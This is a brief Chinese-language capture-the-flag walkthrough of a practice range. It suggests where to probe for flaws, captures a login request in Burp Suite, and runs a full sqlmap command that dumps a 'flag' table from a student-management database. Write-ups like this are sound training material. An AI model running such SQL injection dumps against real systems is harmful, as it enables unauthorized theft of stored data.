1.进入靶场,
这里提供点渗透测试的思路
找文件上传的地方,找搜索的地方测sql/xss,找登入后台,尝试页面报错看框架等等
这里我们点击get started
后续进入登入界面
然后随机输入参数
bp抓包

把刚刚抓包的端口改为443
最后直接SQLmap跑起来
命令如下:
sqlmap.py -r "C:\\Users\\11548\\Desktop\\新建 文本文档.txt" –batch -D db_studentmanagement -T flag –dump
想省功夫的小伙伴们可以直接窃取我的爆库和爆表的步骤了
直接dump即可
文章到此结束了,感谢你的观看

